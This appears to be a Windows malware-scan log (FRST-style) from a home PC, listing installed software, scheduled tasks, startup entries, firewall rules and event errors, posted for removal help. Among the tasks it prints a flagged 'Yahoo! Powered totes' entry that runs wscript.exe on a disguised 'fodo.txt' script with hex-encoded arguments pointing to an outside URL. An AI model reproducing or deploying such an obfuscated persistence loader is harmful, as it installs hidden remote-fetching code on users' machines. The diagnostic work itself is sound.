CCleaner (HKLM\...\CCleaner) (Version: 5.35 - Piriform)
DownloadX ActiveX Download Control 1.6.8 (HKLM\...\CA17A131-B7D9-41D6-868F-29A9BD9FCC8E_is1) (Version: - Genesis Mobile)
Driver Booster 5 (HKLM\...\Driver Booster_is1) (Version: 5.0.3 - IObit)
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM\...\Google Chrome) (Version: 62.0.3202.94 - Google Inc.)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
HP Dropbox Plugin (HKLM\...\{D12BC084-97D6-438A-AA7C-5962608D17A0}) (Version: 36.0.41.58587 - HP)
HP Google Drive Plugin (HKLM\...\{BFA42100-DB54-467A-BB87-CF70732B4065}) (Version: 36.0.41.58587 - HP)
HP OfficeJet 4650 series Basic Device Software (HKLM\...\{316F2147-3ED3-4AB3-80DD-00D458AE6DA8}) (Version: 40.11.1122.1796 - HP Inc.)
HP OfficeJet 4650 series Help (HKLM\...\{20CA428A-0827-4441-BC64-5C577EA970AD}) (Version: 36.0.0 - Hewlett Packard)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM\...\{11ED31EC-7EFA-4D56-B71D-E0214C8984CC}) (Version: 12.3.7.0 - HP)
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
IMVU Avatar Chat Software (HKU\S-1-5-21-3948143356-924845713-1080013463-1000\...\IMVU Avatar chat client software BETA) (Version: - )
IObit Uninstaller (HKLM\...\IObitUninstall) (Version: 6.1.0.510 - IObit)
Java 8 Update 151 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Lightshot-5.4.0.10 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.10 - Skillbrains)
Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation)
Microsoft Office Excel Viewer (HKLM\...\{95120000-003F-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Small Business Edition 2003 (HKLM\...\{91CA0409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual Studio 2017 (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.12.111.1002 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.62.40 - NVIDIA Corporation)
Office Printing Essentials 3 (HKLM\...\{54E76A97-D5FB-4EF4-857B-838E47705B98}) (Version: 25.0.0.5 - Nova Development)
paint.net (HKLM\...\{02D89175-E08F-401B-BA30-8B7512B57723}) (Version: 4.0.17 - dotPDN LLC)
QuickTime (HKLM\...\{F07B861C-72B9-40A4-8B1A-AAED4C06A7E8}) (Version: 7.1.3.100 - Apple Computer, Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8186 - Realtek Semiconductor Corp.)
Reimage Repair (HKLM\...\Reimage Repair) (Version: 1.8.7.1 - Reimage) <==== ATTENTION
Smart Defrag 5 (HKLM\...\Smart Defrag_is1) (Version: 5.7.1 - IObit)
swMSM (HKLM\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
WinRAR 5.40 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wondershare Video Converter Ultimate(Build 8.6.0.0) (HKLM\...\Wondershare Video Converter Ultimate_is1) (Version: 8.6.0.0 - Wondershare Software)
Yahoo Search Set (HKLM\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3948143356-924845713-1080013463-1000_Classes\CLSID\{A10E0335-AFCA-4E7E-975F-CA30235FB29A}\InprocServer32 -> C:\Users\sheri\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
CustomCLSID: HKU\S-1-5-21-3948143356-924845713-1080013463-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll [2017-09-26] ()
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll [2017-09-26] ()
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files\IObit\Advanced SystemCare\ASCExtMenu.dll [2017-12-13] (IObit)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers1: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\Windows\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {55D63393-DB17-4A2B-9052-15D85B4B1344} => C:\Windows\System32\WSCM32.dll [2015-02-27] ()
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files\IObit\Advanced SystemCare\ASCExtMenu.dll [2017-12-13] (IObit)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files\IObit\Advanced SystemCare\ASCExtMenu.dll [2017-12-13] (IObit)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2015-01-30] (NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll [2017-09-26] ()
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers6: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\Windows\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09C1B22F-BD70-4E6F-856E-72ED5466C598} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\system32\Macromed\Flash\FlashUtil32_28_0_0_126_pepper.exe [2017-12-13] (Adobe Systems Incorporated)
Task: {11ACD47F-8094-459A-B80F-460A14C2D6D8} - System32\Tasks\HPCustParticipation HP Officejet 4630 series => C:\Program Files\HP\HP Officejet 4630 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
Task: {28645BE9-1EF1-4D5F-95D3-8B9A9972A7C5} - System32\Tasks\Driver Booster SkipUAC (sheri) => C:\Program Files\IObit\Driver Booster\5.0.3\DriverBooster.exe [2017-09-22] (IObit)
Task: {2FDE5BE9-DBD5-40C9-88CC-FE13B0F157BC} - System32\Tasks\update-S-1-5-21-3948143356-924845713-1080013463-1000 => C:\Program Files\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {52B41B6D-6CC4-48FD-9E6E-816B31495548} - System32\Tasks\HPCustParticipation HP OfficeJet 4650 series => C:\Program Files\HP\HP OfficeJet 4650 series\Bin\HPCustPartic.exe [2017-04-06] (HP Inc.)
Task: {54390A99-8443-4D79-BDD4-B715FA7DFBCE} - System32\Tasks\SmartDefrag_Update => C:\Program Files\IObit\Smart Defrag\AutoUpdate.exe [2017-07-28] (IObit)
Task: {5962C689-9B58-4390-9CE2-AE9C2205F4C9} - System32\Tasks\Yahoo! Powered totes => C:\Windows\system32\wscript.exe "C:\ProgramData\{C7F70294-4DB5-8852-CB73-161051319DDE}\fodo.txt" "68747470733a2f2f7275647564756c752e636f6d" "433a5c50726f6772616d446174615c7b43374637303239342d344442352d383835322d434237332d3136313035313331394444457d5c736973657365" "433a5c50726f6772616d446174615c7b43374637303239342d344442352d38383532 (the data entry has 86 more characters). <==== ATTENTION
Task: {6056F227-06D3-4BAF-831F-266F5362E3D7} - System32\Tasks\ASC11_SkipUac_sheri => C:\Program Files\IObit\Advanced SystemCare\ASC.exe [2017-11-08] (IObit)
Task: {72C1DDE0-95D8-49F9-BF64-2DE48FE2A760} - System32\Tasks\update-sys => C:\Program Files\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {793D4E3D-BDFF-40B0-89BF-0E9F5D08DF3C} - System32\Tasks\Driver Booster Scheduler => C:\Program Files\IObit\Driver Booster\5.0.3\Scheduler.exe [2017-08-30] (IObit)
Task: {93F6B2D5-2C58-4F6F-B50C-D22B51371A7F} - System32\Tasks\ASC11_PerformanceMonitor => C:\Program Files\IObit\Advanced SystemCare\Monitor.exe [2017-11-07] (IObit)
Task: {95C21BF1-3B35-4BFD-9B5A-74AAA32CEE94} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-10-31] (Google Inc.)
Task: {A1A5488F-B4A5-4888-A14C-4A5D7D72B49D} - System32\Tasks\SmartDefrag_Startup => C:\Program Files\IObit\Smart Defrag\SmartDefrag.exe [2017-10-16] (IObit)
Task: {A68B6B44-DD2C-4459-8904-3A9EDEF67BE8} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-12-13] (Adobe Systems Incorporated)
Task: {A7232125-7516-4CA1-8375-CF49F8A16152} - System32\Tasks\ASC_ASCTray_Auto => C:\Program Files\IObit\Advanced SystemCare\ASCTray.exe [2017-09-20] (IObit)
Task: {AA1E3FDD-24E3-45D4-B9CA-4B1F326E7AE5} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-09-10] (Reimage®) <==== ATTENTION
Task: {B83A239D-C4E7-45F3-8F1F-EE23A9120A75} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D48B948B-ABFF-4298-97AC-E67C68369044} - System32\Tasks\Uninstaller_SkipUac_sheri => C:\Program Files\IObit\IObit Uninstaller\IObitUninstaler.exe [2016-12-15] (IObit)
Task: {D91E6A00-129F-4C6A-9274-4A62575FA80E} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {EF587BFF-B3FB-4D5E-97D7-353F9E546E0D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-09-19] (Piriform Ltd)
Task: {F02097F8-F737-481C-BBBE-7705062BA1CC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-10-31] (Google Inc.)
Task: {F0460CD2-3045-4293-BB0B-B4C72A4B46C6} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\update-S-1-5-21-3948143356-924845713-1080013463-1000.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\Yahoo! Powered totes.job => Wscript.exe C:\ProgramData\{C7F70294-4DB5-8852-CB73-161051319DDE}\fodo.txt <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2017-02-04 04:33 - 2015-01-30 16:48 - 000078480 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000407632 _____ () C:\Program Files\Common Files\Adobe\CoreSyncExtension\CoreSync_x86.dll
2017-04-14 14:52 - 2015-02-27 13:38 - 000214528 _____ () C:\Windows\System32\WSCM32.dll
2017-02-04 04:41 - 2016-01-11 17:03 - 000899872 _____ () C:\Program Files\IObit\Smart Defrag\webres.dll
2017-02-04 04:41 - 2016-01-11 17:02 - 000630048 _____ () C:\Program Files\IObit\Smart Defrag\ProductStatistics.dll
2017-09-16 14:23 - 2016-08-18 18:43 - 000442144 _____ () C:\Program Files\IObit\Advanced SystemCare\madExcept_.bpl
2017-09-16 14:23 - 2016-08-18 18:43 - 000210720 _____ () C:\Program Files\IObit\Advanced SystemCare\madBasic_.bpl
2017-09-16 14:23 - 2016-08-18 18:43 - 000059680 _____ () C:\Program Files\IObit\Advanced SystemCare\madDisAsm_.bpl
2017-02-04 04:18 - 2017-08-04 13:44 - 000082720 _____ () C:\Program Files\IObit\Advanced SystemCare\GetProcessDLL.dll
2017-02-04 04:18 - 2015-12-28 13:50 - 000899872 _____ () C:\Program Files\IObit\Advanced SystemCare\webres.dll
2017-02-04 04:20 - 2016-06-21 19:30 - 000442144 _____ () C:\Program Files\IObit\IObit Uninstaller\madExcept_.bpl
2017-02-04 04:20 - 2016-06-21 19:29 - 000210720 _____ () C:\Program Files\IObit\IObit Uninstaller\madBasic_.bpl
2017-02-04 04:20 - 2016-06-21 19:29 - 000059680 _____ () C:\Program Files\IObit\IObit Uninstaller\madDisAsm_.bpl
2017-02-04 04:20 - 2015-12-28 13:50 - 000899872 _____ () C:\Program Files\IObit\IObit Uninstaller\webres.dll
2017-02-04 04:20 - 2016-09-26 13:59 - 000631072 _____ () C:\Program Files\IObit\IObit Uninstaller\ProductStatistics.dll
2017-02-04 04:18 - 2017-06-10 15:33 - 000631584 _____ () C:\Program Files\IObit\Advanced SystemCare\ProductStatistics.dll
2017-11-15 20:40 - 2017-11-10 01:21 - 003075928 _____ () C:\Program Files\Google\Chrome\Application\62.0.3202.94\libglesv2.dll
2017-11-15 20:40 - 2017-11-10 01:21 - 000086872 _____ () C:\Program Files\Google\Chrome\Application\62.0.3202.94\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\sheri\Downloads\driver_booster_setup.exe:BDU [0]
AlternateDataStreams: C:\Users\sheri\Downloads\mssstool32.exe:BDU [0]
AlternateDataStreams: C:\Users\sheri\Downloads\ReimageRepair (1).exe:BDU [0]
AlternateDataStreams: C:\Users\sheri\Downloads\ReimageRepair.exe:BDU [0]
AlternateDataStreams: C:\Users\sheri\Downloads\wrar550.exe:BDU [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VipreEdgeProtection => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebExaminer => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:04 - 2017-02-04 04:14 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3948143356-924845713-1080013463-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\sheri\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.1 - 205.171.2.25
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^Users^sheri^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Cartridge Alerts - HP OfficeJet 4650 series (Network).lnk => C:\Windows\pss\Monitor Cartridge Alerts - HP OfficeJet 4650 series (Network).lnk.Startup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: Advanced SystemCare 10 => "C:\Program Files\IObit\Advanced SystemCare\ASCTray.exe" /Auto
MSCONFIG\startupreg: Advanced SystemCare 11 => "C:\Program Files\IObit\Advanced SystemCare\ASCTray.exe" /Auto
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: DelaypluginInstall => C:\ProgramData\Wondershare\Video Converter Ultimate\DelayPluginI.exe
MSCONFIG\startupreg: HP OfficeJet 4650 series (NET) => "C:\Program Files\HP\HP OfficeJet 4650 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH6BS4J14P0662:NW" -scfn "HP OfficeJet 4650 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: IObit Malware Fighter => "C:\Program Files\IObit\IObit Malware Fighter\IMF.exe" /autostart
MSCONFIG\startupreg: Lightshot => C:\Program Files\Skillbrains\lightshot\Lightshot.exe
MSCONFIG\startupreg: Malwarebytes TrayApp => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe
MSCONFIG\startupreg: MSC => "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\qttask.exe" -atboottime
MSCONFIG\startupreg: ReminderApp_EEAC3053-7055-4143-B8A0-306758055099 => C:\Program Files\Nova Development\Office Printing Essentials 3\ReminderApp.exe
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe" -s
MSCONFIG\startupreg: SBAMTray => "C:\Program Files\VIPRE\SBAMTray.exe"
MSCONFIG\startupreg: SmileboxTray => "C:\Users\sheri\AppData\Roaming\Smilebox\SmileboxTray.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Wondershare Media Server => C:\Program Files\Wondershare\Video Converter Ultimate\MediaLibServer.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{A714DB86-A236-4EF1-922D-3AF9EC008707}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{61FF5A8D-2974-4A74-9FB5-E8A22EFA3361}] => (Allow) C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{50119E2D-6721-4A91-B89B-22C71DCC7416}] => (Allow) C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [TCP Query User{8CBD56B9-E123-4541-8B24-34C8B133ED9A}C:\program files\wondershare\video converter ultimate\mediaserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\mediaserver.exe
FirewallRules: [UDP Query User{DF899D01-70BD-41ED-9697-0F1D87097633}C:\program files\wondershare\video converter ultimate\mediaserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\mediaserver.exe
FirewallRules: [TCP Query User{3ABCCBEE-5347-416E-BACC-6904755945C5}C:\program files\wondershare\video converter ultimate\medialibserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\medialibserver.exe
FirewallRules: [UDP Query User{1C1B0F07-1CAF-489A-8DCE-E0CF1EDFBFB0}C:\program files\wondershare\video converter ultimate\medialibserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\medialibserver.exe
FirewallRules: [TCP Query User{48ACC076-5895-4AE5-B22D-FCBF4E676813}C:\program files\wondershare\video converter ultimate\medialibserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\medialibserver.exe
FirewallRules: [UDP Query User{1D5FCD64-FA2C-4ACD-821A-45FF1268A1C6}C:\program files\wondershare\video converter ultimate\medialibserver.exe] => (Allow) C:\program files\wondershare\video converter ultimate\medialibserver.exe
FirewallRules: [{0FD499AD-F486-4EE0-80A6-7784BA4575C2}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\bin\FaxPrinterUtility.exe
FirewallRules: [{E986AAC6-71D1-4B77-9BA3-97EC99F2997D}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\bin\FaxApplications.exe
FirewallRules: [{5E086D01-25DA-4C0A-91BB-F053E9C71FBA}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\bin\DigitalWizards.exe
FirewallRules: [{FE4E1177-5E21-43F0-A19E-FB019C2190BE}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\bin\SendAFax.exe
FirewallRules: [{B72BA15F-D4AE-412F-9EB0-10E629A45401}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\Bin\DeviceSetup.exe
FirewallRules: [{54C6B2E0-D15F-449A-ABF6-0C5652710A84}] => (Allow) LPort=5357
FirewallRules: [{B9907856-7D49-4893-B0BC-48960C084DBA}] => (Allow) C:\Program Files\HP\HP OfficeJet 4650 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{6DF75AD9-5CF1-43E9-A361-BA2DDA5E8015}] => (Block) LPort=445
FirewallRules: [{E86A628C-6A6F-494F-96D3-D08C09501F08}] => (Block) LPort=445
FirewallRules: [{5DBED4D0-8F25-4D09-BD0E-8670A1148C03}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\DriverBooster.exe
FirewallRules: [{C9BEB34E-FA49-47CB-992B-887FA6FD1922}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\DriverBooster.exe
FirewallRules: [{F899059D-9695-451F-BB8B-108F75B75187}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\DBDownloader.exe
FirewallRules: [{6006D86F-E84B-4DCE-A169-A4D46C3DAF7F}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\DBDownloader.exe
FirewallRules: [{C4B55828-5F44-4A7B-8DEF-1B103D9A144E}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\AutoUpdate.exe
FirewallRules: [{F767AD7D-DE7F-4AE6-9C52-68AD98296CAE}] => (Allow) C:\Program Files\IObit\Driver Booster\5.0.3\AutoUpdate.exe
FirewallRules: [{102B0DC7-A94A-4510-84D9-65144ABBC56A}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

01-12-2017 20:20:10 Windows Modules Installer
03-12-2017 18:53:43 Installed Windows 7 USB/DVD Download Tool
05-12-2017 05:32:42 Windows Update
12-12-2017 05:22:21 Windows Update
12-12-2017 08:22:24 Windows Update
12-12-2017 08:38:33 Windows Update
13-12-2017 02:24:06 Windows Update
13-12-2017 05:04:49 Removed HP Officejet 4630 series Basic Device Software
13-12-2017 05:29:34 Removed Windows 7 USB/DVD Download Tool

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/13/2017 07:15:31 AM) (Source: WgaNotify) (EventID: 4373) (User: )
Description: Event-ID 4373

Error: (12/13/2017 07:15:00 AM) (Source: WgaNotify) (EventID: 4373) (User: )
Description: Event-ID 4373

Error: (12/13/2017 06:28:38 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (12/13/2017 06:22:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: VIPREUI.exe, version: 10.1.4.33, time stamp: 0x5977bfbd
Faulting module name: PresentationCore.ni.dll, version: 4.7.2117.0, time stamp: 0x59cf595b
Exception code: 0xc00000fd
Fault offset: 0x0024615f
Faulting process id: 0x15b8
